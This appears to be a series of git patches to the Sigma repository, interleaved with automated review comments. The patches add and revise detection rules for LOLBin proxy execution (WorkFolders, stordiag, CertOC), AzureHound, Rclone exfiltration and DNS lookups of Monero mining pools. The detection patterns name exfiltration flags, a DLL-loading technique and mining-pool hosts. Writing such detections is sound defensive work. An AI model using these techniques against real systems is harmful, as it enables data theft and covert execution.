@@ -0,0 +1,25 @@ +title: Execution via WorkFolders.exe +id: 0bbc6369-43e3-453d-9944-cae58821c173 +status: experimental +description: Detects using WorkFolders.exe to execute an arbitrary control.exe +references: + - https://twitter.com/elliotkillick/status/1449812843772227588 +tags: + - attack.defense_evasion + - attack.t1218 +author: Maxime Thiebaut (@0xThiebaut) +date: 2021/10/21 +logsource: + category: process_creation + product: windows + definition: 'Requirements: Sysmon ProcessCreation logging must be activated' +detection: + selection: + Image|endswith: '\control.exe' + ParentImage|endswith: '\WorkFolders.exe' + filter: + Image: 'C:\Windows\System32\control.exe' + condition: selection and not filter +falsepositives: + - Legitimate usage of the uncommon Windows Work Folders feature. +level: high From e772dbf0a9d5f7370abe44daf3b10f9036b3a356 Mon Sep 17 00:00:00 2001 From: davedhoff <3jonii3@gmail.com> Date: Fri, 22 Oct 2021 13:56:47 -0500 Subject: [PATCH 1288/1367] Import Iterable from collections.abc --- tools/sigma/config/collection.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/config/collection.py b/tools/sigma/config/collection.py index cf870557..1abf3f4c 100644 --- a/tools/sigma/config/collection.py +++ b/tools/sigma/config/collection.py @@ -14,7 +14,7 @@ # You should have received a copy of the GNU Lesser General Public License # along with this program. If not, see . -from collections import Iterable +from collections.abc import Iterable from pathlib import Path import sys import re From a5fae664b94eb478e92e3d0df3fca12241ed54ca Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Fri, 22 Oct 2021 19:48:10 -0500 Subject: [PATCH 1289/1367] Create process_creation_stordiag_execution.yml --- .../process_creation_stordiag_execution.yml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 rules/windows/process_creation_stordiag_execution.yml 
diff --git a/rules/windows/process_creation_stordiag_execution.yml b/rules/windows/process_creation_stordiag_execution.yml new file mode 100644 index 00000000..84a6fc4a --- /dev/null +++ b/rules/windows/process_creation_stordiag_execution.yml @@ -0,0 +1,29 @@ +title: Execution via stordiag.exe +id: 961e0abb-1b1e-4c84-a453-aafe56ad0d34 +status: experimental +description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe +references: + - https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html + - https://twitter.com/eral4m/status/1451112385041911809 +tags: + - attack.defense_evasion + - attack.t1218 +author: Austin Songer (@austinsonger) +date: 2021/10/21 +logsource: + category: process_creation + product: windows +detection: + selection1: + Image|endswith: '\schtasks.exe' + ParentImage|endswith: '\stordiag.exe' + selection2: + Image|endswith: '\systeminfo.exe' + ParentImage|endswith: '\stordiag.exe' + selection3: + Image|endswith: '\fltmc.exe' + ParentImage|endswith: '\stordiag.exe' + condition: selection1 or selection2 or selection3 +falsepositives: + - Legitimate usage of stordiag.exe. +level: high From 448c86587fd89faefeaf5d95270a3e4a37ab2ef3 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 13:29:16 -0500 Subject: [PATCH 1290/1367] Update process_creation_stordiag_execution.yml --- .../process_creation_stordiag_execution.yml | 19 ++++++++++--------- 1 file changed, 10 insertions(+), 9 deletions(-) diff --git a/rules/windows/process_creation_stordiag_execution.yml b/rules/windows/process_creation_stordiag_execution.yml index 84a6fc4a..8820ff98 100644 --- a/rules/windows/process_creation_stordiag_execution.yml +++ b/rules/windows/process_creation_stordiag_execution.yml 
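Review bot: The new rule is created at `rules/windows/process_creation_stordiag_execution.yml`, directly under `rules/windows/`, whereas the other process-creation rules on this page live in `rules/windows/process_creation/`; the path should be `rules/windows/process_creation/process_creation_stordiag_execution.yml` so directory-based tooling and reviewers find it with its category. `selection1`..`selection3` repeat the same `ParentImage|endswith: '\stordiag.exe'` clause and differ only in `Image`, so one selection with an `Image|endswith` list expresses the same logic (the follow-up PATCH 1290 does this). `definition:` is absent although, as with PATCH 1287's rules, the rule depends on process-creation logging with parent-image data.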
@@ -14,16 +14,17 @@ logsource:
 category: process_creation
 product: windows
 detection:
- selection1:
- Image|endswith: '\schtasks.exe'
+ selection:
 ParentImage|endswith: '\stordiag.exe'
- selection2:
- Image|endswith: '\systeminfo.exe'
- ParentImage|endswith: '\stordiag.exe'
- selection3:
- Image|endswith: '\fltmc.exe'
- ParentImage|endswith: '\stordiag.exe'
- condition: selection1 or selection2 or selection3
+ Image|endswith:
+ - '\schtasks.exe'
+ - '\systeminfo.exe'
+ - '\fltmc.exe'
+ filter:
+ ParentImage|startwith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder"
+ - c:\windows\system32\
+ - c:\windows\syswow64\
+ condition: selection and not filter
 falsepositives:
 - Legitimate usage of stordiag.exe.
 level: high
From 4803d61f7f254f5326529a963563c23c3c920741 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Sat, 23 Oct 2021 14:09:28 -0500
Subject: [PATCH 1291/1367] Create process_creation_certoc_execution.yml
---
 .../process_creation_certoc_execution.yml | 27 +++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 rules/windows/process_creation/process_creation_certoc_execution.yml
diff --git a/rules/windows/process_creation/process_creation_certoc_execution.yml b/rules/windows/process_creation/process_creation_certoc_execution.yml
new file mode 100644
index 00000000..1fb83b84
--- /dev/null
+++ b/rules/windows/process_creation/process_creation_certoc_execution.yml
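Review bot: `ParentImage|startwith:` in the new `filter` is not a Sigma modifier; the modifier is `startswith`, and the misspelling will be rejected as an unknown modifier rather than silently matching, so the whole rule fails to convert. Change the line to `ParentImage|startswith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder"`. The two path values are unquoted plain scalars ending in a backslash; quoting them as `'c:\windows\system32\'` and `'c:\windows\syswow64\'` matches the quoting style of the `Image|endswith` list above and avoids YAML edge cases with trailing backslashes.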
@@ -0,0 +1,27 @@ +title: Install Certificate via CertOC.exe +id: 242301bc-f92f-4476-8718-78004a6efd9f +description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. +status: experimental +author: Austin Songer @austinsonger +date: 2021/10/23 +references: +- https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\certoc.exe' + CommandLine|contains|all: + - '-LoadDLL' + - '.dll' + condition: selection +fields: + - CommandLine + - ParentCommandLine +tags: +- attack.defense_evasion +- attack.t1218 +level: medium +falsepositives: +- None From b94610610314dd989018778d2e6083a7b837f330 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 14:09:58 -0500 Subject: [PATCH 1292/1367] Delete process_creation_certoc_execution.yml --- .../process_creation_certoc_execution.yml | 27 ------------------- 1 file changed, 27 deletions(-) delete mode 100644 rules/windows/process_creation/process_creation_certoc_execution.yml diff --git a/rules/windows/process_creation/process_creation_certoc_execution.yml b/rules/windows/process_creation/process_creation_certoc_execution.yml deleted file mode 100644 index 1fb83b84..00000000 --- a/rules/windows/process_creation/process_creation_certoc_execution.yml +++ /dev/null 
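Review bot: The `description` says the rule detects a user installing certificates, but the selection matches `-LoadDLL` plus `.dll` on the certoc.exe command line, i.e. DLL loading through CertOC, which is also what the `attack.t1218` tag and the referenced tweet describe; reword it to `description: Detects certoc.exe being used with -LoadDLL to load a DLL, a signed-binary proxy execution technique` and fix "to loads". The same text is deleted in PATCH 1292 and recreated unchanged in PATCH 1293, so the correction applies to that copy as well. `references:` and `tags:` list items sit at column 0 while the rest of the page's rules indent them by two spaces, and `falsepositives: - None` should follow the `Unknown` wording used elsewhere.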
@@ -1,27 +0,0 @@ -title: Install Certificate via CertOC.exe -id: 242301bc-f92f-4476-8718-78004a6efd9f -description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. -status: experimental -author: Austin Songer @austinsonger -date: 2021/10/23 -references: -- https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 -logsource: - category: process_creation - product: windows -detection: - selection: - Image|endswith: '\certoc.exe' - CommandLine|contains|all: - - '-LoadDLL' - - '.dll' - condition: selection -fields: - - CommandLine - - ParentCommandLine -tags: -- attack.defense_evasion -- attack.t1218 -level: medium -falsepositives: -- None From a78d6cce5ff8f4eb34c4b047b09a83875be7cfb1 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 14:10:40 -0500 Subject: [PATCH 1293/1367] Create process_creation_certoc_execution.yml --- .../process_creation_certoc_execution.yml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 rules/windows/process_creation/process_creation_certoc_execution.yml diff --git a/rules/windows/process_creation/process_creation_certoc_execution.yml b/rules/windows/process_creation/process_creation_certoc_execution.yml new file mode 100644 index 00000000..698a73f3 --- /dev/null +++ b/rules/windows/process_creation/process_creation_certoc_execution.yml 
@@ -0,0 +1,28 @@ +title: Install Certificate via CertOC.exe +id: 242301bc-f92f-4476-8718-78004a6efd9f +description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. +status: experimental +author: Austin Songer @austinsonger +date: 2021/10/23 +references: +- https://twitter.com/sblmsrsn/status/1445758411803480072?s=20 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\certoc.exe' + CommandLine|contains|all: + - '-LoadDLL' + - '.dll' + condition: selection +fields: + - CommandLine + - ParentCommandLine +tags: +- attack.defense_evasion +- attack.t1218 +level: medium +falsepositives: +- None + From a712a0d14e53a52b20e534e952c6bca9419f1a3f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 23 Oct 2021 23:08:51 +0200 Subject: [PATCH 1294/1367] Create LICENSE --- LICENSE | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 LICENSE diff --git a/LICENSE b/LICENSE new file mode 100644 index 00000000..210f8671 --- /dev/null +++ b/LICENSE @@ -0,0 +1,7 @@ +# Licenses + +The content of this repository is released under the following licenses: + +- The toolchain (everything under tools/) is licensed under the GNU Lesser General Public License +- The Sigma specification is public domain +- Everything else, especially the rules contained in the rules/ directory are released under the Detection Rule License (DRL) 1.1 From 916172de53b38f4ed3f44d7975b69fbb14c6ccb3 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 23 Oct 2021 23:09:35 +0200 Subject: [PATCH 1295/1367] Update README.md --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 4815056d..951344e3 100644 --- a/README.md +++ b/README.md 
@@ -361,9 +361,9 @@ Last but not least, the more people use Sigma, the better, so help promote it by The content of this repository is released under the following licenses: -* The toolchain (everything under `tools/`) is licensed under the [GNU Lesser General Public License](https://www.gnu.org/licenses/lgpl-3.0.en.html). -* The [Sigma specification](https://github.com/Neo23x0/sigma/wiki) is public domain. -* Everything else, especially the rules contained in the `rules/` directory is released under the [Detection Rule License (DRL) 1.0](https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md). +* The toolchain (everything under `tools/`) is licensed under the [GNU Lesser General Public License](https://www.gnu.org/licenses/lgpl-3.0.en.html) +* The [Sigma specification](https://github.com/Neo23x0/sigma/wiki) is public domain +* The rules contained in the `rules/` directory are released under the [Detection Rule License (DRL) 1.1](https://github.com/Neo23x0/sigma/blob/master/LICENSE.Detection.Rules.md) # Credits From f3e530bfbad01cdc20399094f4abbb0b6ad8ed3e Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sat, 23 Oct 2021 23:09:54 +0200 Subject: [PATCH 1296/1367] Update LICENSE --- LICENSE | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/LICENSE b/LICENSE index 210f8671..19f1b846 100644 --- a/LICENSE +++ b/LICENSE @@ -4,4 +4,4 @@ The content of this repository is released under the following licenses: - The toolchain (everything under tools/) is licensed under the GNU Lesser General Public License - The Sigma specification is public domain -- Everything else, especially the rules contained in the rules/ directory are released under the Detection Rule License (DRL) 1.1 +- The rules contained in the rules/ directory are released under the Detection Rule License (DRL) 1.1 From 923391224a19b5d250d547d58999aff4822d9cca Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Sat, 23 Oct 2021 18:27:36 -0500 Subject: [PATCH 1297/1367] Create powershell_azurehound_commands.yml --- .../powershell_azurehound_commands.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/windows/powershell/powershell_script/powershell_azurehound_commands.yml diff --git a/rules/windows/powershell/powershell_script/powershell_azurehound_commands.yml b/rules/windows/powershell/powershell_script/powershell_azurehound_commands.yml new file mode 100644 index 00000000..491e1d7c --- /dev/null +++ b/rules/windows/powershell/powershell_script/powershell_azurehound_commands.yml @@ -0,0 +1,30 @@ +title: AzureHound PowerShell Commands +id: 83083ac6-1816-4e76-97d7-59af9a9ae46e +status: experimental +description: +references: + - https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/AzureHound.ps1 + - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html +author: Austin Songer (@austinsonger) +date: 2021/10/23 +logsource: + product: windows + category: ps_script + definition: Script Block Logging must be enable +detection: + selection: + ScriptBlockText|contains: + - "Invoke-AzureHound" + condition: selection +tags: + - attack.discovery + - attack.t1482 + - attack.t1087 + - attack.t1087.001 + - attack.t1087.002 + - attack.t1069.001 + - attack.t1069.002 + - attack.t1069 +falsepositives: + - Penetration testing +level: high From 76aa8bf904c1efbb1882b1da36742d365a5340b7 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:50:03 -0500 Subject: [PATCH 1298/1367] Create windows_suspicious_rclone_execution.yml --- .../windows_suspicious_rclone_execution.yml | 56 +++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 rules/windows/process_creation/windows_suspicious_rclone_execution.yml 
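Review bot: `description:` is left empty, so the rule ships with no statement of what it detects; `description: Detects AzureHound PowerShell collector commands (Invoke-AzureHound) in Script Block Logging` would match the title, the reference and the selection. The `logsource` `definition:` reads `Script Block Logging must be enable` and should be `enabled`. `level: high` with `falsepositives: - Penetration testing` is reasonable for a `contains` on `Invoke-AzureHound`, but a single-element list under `ScriptBlockText|contains` can be written as a plain scalar for consistency with the other rules in this series.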
diff --git a/rules/windows/process_creation/windows_suspicious_rclone_execution.yml b/rules/windows/process_creation/windows_suspicious_rclone_execution.yml new file mode 100644 index 00000000..b73cf7b7 --- /dev/null +++ b/rules/windows/process_creation/windows_suspicious_rclone_execution.yml @@ -0,0 +1,56 @@ +title: Rclone Execution via Command Line or PowerShell +id: e37db05d-d1f9-49c8-b464-cee1a4b11638 +description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc +status: experimental +date: 2021/05/10 +modified: 2021/06/29 +author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group +references: + - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ + - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware + - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a + - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone + - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html +tags: + - attack.exfiltration + - attack.t1567.002 +falsepositives: + - Legitimate Rclone usage (rare) +level: high +logsource: + product: windows + category: process_creation +detection: + exec_selection: + Image|endswith: '\rclone.exe' + ParentImage|endswith: + - '\PowerShell.exe' + - '\cmd.exe' + command_selection: + CommandLine|contains: + - 'pass' + - 'user' + - 'copy' + - 'sync' + - 'config' + - 'lsd' + - 'remote' + - 'ls' + - 'mega' + - 'pcloud' + - 'ftp' + - 'ignore-existing' + - 'auto-confirm' + - 'transfers' + - 'multi-thread-streams' + - 'no-check-certificate ' + description_selection: + Description: 'Rsync for cloud storage' + condition: command_selection and ( description_selection or exec_selection ) +fields: + - CommandLine + - ParentCommandLine + - Details +falsepositives: + - Legitimate RClone use +level: high 
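Review bot: Dropping the surrounding spaces from the `CommandLine|contains` list makes `command_selection` nearly unconditional: `'ls'`, `'user'`, `'pass'`, `'copy'` and `'ftp'` are substrings of ordinary paths and arguments (any path under `Users` or `tools` satisfies it), so the condition collapses to `description_selection or exec_selection`. The rule deleted in PATCH 1299 padded these as `' pass '`, `' user '`, `' ls '`; restoring that padding, or keeping only the longer rclone-specific flags, keeps `command_selection` meaningful. `'no-check-certificate '` is the only entry that still carries a trailing space, which looks accidental. The file also declares `falsepositives:` and `level:` twice (once after `tags:`, once at the end), which strict YAML loaders reject; PATCH 1304 later in the series removes the first copies.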
From a7715490572c3deeecdcdc1706c736e298744632 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:51:50 -0500 Subject: [PATCH 1299/1367] Delete win_susp_rclone_exec.yml --- .../process_creation/win_susp_rclone_exec.yml | 37 ------------------- 1 file changed, 37 deletions(-) delete mode 100644 rules/windows/process_creation/win_susp_rclone_exec.yml diff --git a/rules/windows/process_creation/win_susp_rclone_exec.yml b/rules/windows/process_creation/win_susp_rclone_exec.yml deleted file mode 100644 index b6e35d7a..00000000 --- a/rules/windows/process_creation/win_susp_rclone_exec.yml +++ /dev/null @@ -1,37 +0,0 @@ -title: Rclone Execution via Command Line or PowerShell -id: cb7286ba-f207-44ab-b9e6-760d82b84253 -description: Detects Rclone which is commonly used by ransomware groups for exfiltration -status: experimental -date: 2021/05/26 -author: Aaron Greetham (@beardofbinary) - NCC Group -references: - - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ -tags: - - attack.exfiltration - - attack.t1567.002 -falsepositives: - - Legitimate Rclone usage (rare) -level: high -logsource: - product: windows - category: process_creation -detection: - exec_selection: - Image|endswith: '\rclone.exe' - ParentImage|endswith: - - '\PowerShell.exe' - - '\cmd.exe' - command_selection: - CommandLine|contains: - - ' pass ' - - ' user ' - - ' copy ' - - ' mega ' - - ' sync ' - - ' config ' - - ' lsd ' - - ' remote ' - - ' ls ' - description_selection: - Description: 'Rsync for cloud storage' - condition: command_selection and ( description_selection or exec_selection ) \ No newline at end of file From 2f5e235dfe2451f01d904ce21835ea2e7dea7566 Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Sat, 23 Oct 2021 19:51:59 -0500 Subject: [PATCH 1300/1367] Delete sysmon_rclone_execution.yml --- .../sysmon_rclone_execution.yml | 46 ------------------- 1 file changed, 46 deletions(-) delete mode 100644 rules/windows/process_creation/sysmon_rclone_execution.yml diff --git a/rules/windows/process_creation/sysmon_rclone_execution.yml b/rules/windows/process_creation/sysmon_rclone_execution.yml deleted file mode 100644 index 3a0b7dfe..00000000 --- a/rules/windows/process_creation/sysmon_rclone_execution.yml +++ /dev/null @@ -1,46 +0,0 @@ -title: RClone Execution -id: a0d63692-a531-4912-ad39-4393325b2a9c -status: experimental -description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc -tags: - - attack.exfiltration - - attack.t1567.002 -author: Bhabesh Raj, Sittikorn S -date: 2021/05/10 -modified: 2021/06/29 -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware - - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a - - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone - - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html -fields: - - CommandLine - - ParentCommandLine - - Details -falsepositives: - - Legitimate RClone use -level: high -logsource: - category: process_creation - product: windows -detection: - selection: - Description: 'Rsync for cloud storage' - selection2: - CommandLine|contains|all: - - '--config ' - - '--no-check-certificate ' - - ' copy ' - selection3: - Image|endswith: - - '\rclone.exe' - CommandLine|contains: - - 'mega' - - 'pcloud' - - 'ftp' - - '--progress' - - '--ignore-existing' - - '--auto-confirm' - - '--transfers' - - '--multi-thread-streams' - condition: 1 of them From 05fcc0d8908defbfbe352c72f01094ea076b969c Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Sat, 23 Oct 2021 19:52:37 -0500 Subject: [PATCH 1301/1367] Rename windows_suspicious_rclone_execution.yml to win_suspicious_rclone_execution.yml --- ...s_rclone_execution.yml => win_suspicious_rclone_execution.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{windows_suspicious_rclone_execution.yml => win_suspicious_rclone_execution.yml} (100%) diff --git a/rules/windows/process_creation/windows_suspicious_rclone_execution.yml b/rules/windows/process_creation/win_suspicious_rclone_execution.yml similarity index 100% rename from rules/windows/process_creation/windows_suspicious_rclone_execution.yml rename to rules/windows/process_creation/win_suspicious_rclone_execution.yml From 2d781ac20b19ab29b3162783a7ffb9d6131ab088 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:55:19 -0500 Subject: [PATCH 1302/1367] Rename win_suspicious_rclone_execution.yml to win_susp_rclone_execution.yml --- ...picious_rclone_execution.yml => win_susp_rclone_execution.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{win_suspicious_rclone_execution.yml => win_susp_rclone_execution.yml} (100%) diff --git a/rules/windows/process_creation/win_suspicious_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml similarity index 100% rename from rules/windows/process_creation/win_suspicious_rclone_execution.yml rename to rules/windows/process_creation/win_susp_rclone_execution.yml From c8383901e131603d1a50ef360064dc1138b8128a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:56:43 -0500 Subject: [PATCH 1303/1367] Update win_susp_rclone_execution.yml --- rules/windows/process_creation/win_susp_rclone_execution.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/rules/windows/process_creation/win_susp_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml index b73cf7b7..0f822a36 100644 --- a/rules/windows/process_creation/win_susp_rclone_execution.yml +++ b/rules/windows/process_creation/win_susp_rclone_execution.yml @@ -3,7 +3,7 @@ id: e37db05d-d1f9-49c8-b464-cee1a4b11638 description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc status: experimental date: 2021/05/10 -modified: 2021/06/29 +modified: 2021/10/23 author: Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group references: - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ From 9664ec4c35f254c2f10f84e1aa5cbd98b80b9fc0 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 23 Oct 2021 19:59:37 -0500 Subject: [PATCH 1304/1367] Update win_susp_rclone_execution.yml --- .../process_creation/win_susp_rclone_execution.yml | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/rules/windows/process_creation/win_susp_rclone_execution.yml b/rules/windows/process_creation/win_susp_rclone_execution.yml index 0f822a36..eca69f3a 100644 --- a/rules/windows/process_creation/win_susp_rclone_execution.yml +++ b/rules/windows/process_creation/win_susp_rclone_execution.yml @@ -11,12 +11,6 @@ references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a - https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone - https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html -tags: - - attack.exfiltration - - attack.t1567.002 -falsepositives: - - Legitimate Rclone usage (rare) -level: high logsource: product: windows category: process_creation 
@@ -51,6 +45,9 @@ fields: - CommandLine - ParentCommandLine - Details +tags: + - attack.exfiltration + - attack.t1567.002 falsepositives: - Legitimate RClone use level: high From 4dc82c95b6164b526fb57536aabf23c35ef368f6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 24 Oct 2021 08:52:23 +0200 Subject: [PATCH 1305/1367] Update process_creation_stordiag_execution.yml --- .../process_creation_stordiag_execution.yml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/rules/windows/process_creation_stordiag_execution.yml b/rules/windows/process_creation_stordiag_execution.yml index 8820ff98..1cd93031 100644 --- a/rules/windows/process_creation_stordiag_execution.yml +++ b/rules/windows/process_creation_stordiag_execution.yml @@ -14,17 +14,17 @@ logsource: category: process_creation product: windows detection: - selection: + selection: ParentImage|endswith: '\stordiag.exe' Image|endswith: - - '\schtasks.exe' - - '\systeminfo.exe' - - '\fltmc.exe' + - '\schtasks.exe' + - '\systeminfo.exe' + - '\fltmc.exe' filter: ParentImage|startwith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder" - - c:\windows\system32\ - - c:\windows\syswow64\ - condition: selection and not filter + - c:\windows\system32\ + - c:\windows\syswow64\ + condition: selection and not filter falsepositives: - Legitimate usage of stordiag.exe. level: high From 587c413a12046b2b7499d8b5fe3ee7227eb504fd Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sun, 24 Oct 2021 09:08:20 +0200 Subject: [PATCH 1306/1367] fix typo error --- rules/windows/process_creation_stordiag_execution.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation_stordiag_execution.yml b/rules/windows/process_creation_stordiag_execution.yml index 1cd93031..b3302e51 100644 --- a/rules/windows/process_creation_stordiag_execution.yml 
+++ b/rules/windows/process_creation_stordiag_execution.yml @@ -21,9 +21,9 @@ detection: - '\systeminfo.exe' - '\fltmc.exe' filter: - ParentImage|startwith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder" - - c:\windows\system32\ - - c:\windows\syswow64\ + ParentImage|startswith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder" + - 'c:\windows\system32\' + - 'c:\windows\syswow64\' condition: selection and not filter falsepositives: - Legitimate usage of stordiag.exe. From 86e9f782cbfd5489ef0bc6d8d10864506376a9d8 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 24 Oct 2021 15:44:44 +0200 Subject: [PATCH 1307/1367] rule: monero mining pools dns lookup --- .../network/net_pua_cryptocoin_mining_xmr.yml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 rules/network/net_pua_cryptocoin_mining_xmr.yml diff --git a/rules/network/net_pua_cryptocoin_mining_xmr.yml b/rules/network/net_pua_cryptocoin_mining_xmr.yml new file mode 100644 index 00000000..972bea29 --- /dev/null +++ b/rules/network/net_pua_cryptocoin_mining_xmr.yml 
@@ -0,0 +1,37 @@ +title: Monero Crypto Coin Mining Pool Connection +id: b593fd50-7335-4682-a36c-4edcb68e4641 +status: stable +description: Detects suspicious DNS queries to Monero mining pools +author: Florian Roth +date: 2021/10/24 +references: + - https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/ +logsource: + category: dns +detection: + selection: + query|contains: + - 'pool.minexmr.com + - 'fr.minexmr.com + - 'de.minexmr.com + - 'sg.minexmr.com + - 'ca.minexmr.com + - 'us-west.minexmr.com + - 'pool.supportxmr.com + - 'mine.c3pool.com + - 'xmr-eu1.nanopool.org + - 'xmr-eu2.nanopool.org + - 'xmr-us-east1.nanopool.org + - 'xmr-us-west1.nanopool.org + - 'xmr-asia1.nanopool.org + - 'xmr-jp1.nanopool.org + - 'xmr-au1.nanopool.org + - 'xmr.2miners.com + - 'xmr.hashcity.org + - 'xmr.f2pool.com + - 'xmrpool.eu + - 'pool.hashvault.pro + condition: selection +falsepositives: + - Legeitimate crypto coin mining +level: high From 7eeecf9c6a28664ce75d4a333fe2c178270255d4 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 24 Oct 2021 15:46:31 +0200 Subject: [PATCH 1308/1367] fix: missing upper tick in every line --- .../network/net_pua_cryptocoin_mining_xmr.yml | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/rules/network/net_pua_cryptocoin_mining_xmr.yml b/rules/network/net_pua_cryptocoin_mining_xmr.yml index 972bea29..580d2861 100644 --- a/rules/network/net_pua_cryptocoin_mining_xmr.yml +++ b/rules/network/net_pua_cryptocoin_mining_xmr.yml 
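Review bot: `falsepositives: - Legeitimate crypto coin mining` is misspelled (`Legitimate`) and survives the quote fix in PATCH 1308 unchanged as a context line. The rule is introduced with `status: stable`, whereas every other rule added in this series starts as `experimental`; a newly written rule with no deployment history normally begins as `experimental` and is promoted later. There is also no `tags:` block, unlike the other rules here; `- attack.impact` plus the resource-hijacking technique (presumably `attack.t1496`) would let the rule be grouped with the rest of the mining detections.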
@@ -11,26 +11,26 @@ logsource: detection: selection: query|contains: - - 'pool.minexmr.com - - 'fr.minexmr.com - - 'de.minexmr.com - - 'sg.minexmr.com - - 'ca.minexmr.com - - 'us-west.minexmr.com - - 'pool.supportxmr.com - - 'mine.c3pool.com - - 'xmr-eu1.nanopool.org - - 'xmr-eu2.nanopool.org - - 'xmr-us-east1.nanopool.org - - 'xmr-us-west1.nanopool.org - - 'xmr-asia1.nanopool.org - - 'xmr-jp1.nanopool.org - - 'xmr-au1.nanopool.org - - 'xmr.2miners.com - - 'xmr.hashcity.org - - 'xmr.f2pool.com - - 'xmrpool.eu - - 'pool.hashvault.pro + - 'pool.minexmr.com' + - 'fr.minexmr.com' + - 'de.minexmr.com' + - 'sg.minexmr.com' + - 'ca.minexmr.com' + - 'us-west.minexmr.com' + - 'pool.supportxmr.com' + - 'mine.c3pool.com' + - 'xmr-eu1.nanopool.org' + - 'xmr-eu2.nanopool.org' + - 'xmr-us-east1.nanopool.org' + - 'xmr-us-west1.nanopool.org' + - 'xmr-asia1.nanopool.org' + - 'xmr-jp1.nanopool.org' + - 'xmr-au1.nanopool.org' + - 'xmr.2miners.com' + - 'xmr.hashcity.org' + - 'xmr.f2pool.com' + - 'xmrpool.eu' + - 'pool.hashvault.pro' condition: selection falsepositives: - Legeitimate crypto coin mining From d051e1418bed4b3747ee427a08446acd1c9c25bc Mon Sep 17 00:00:00 2001 From: Florian 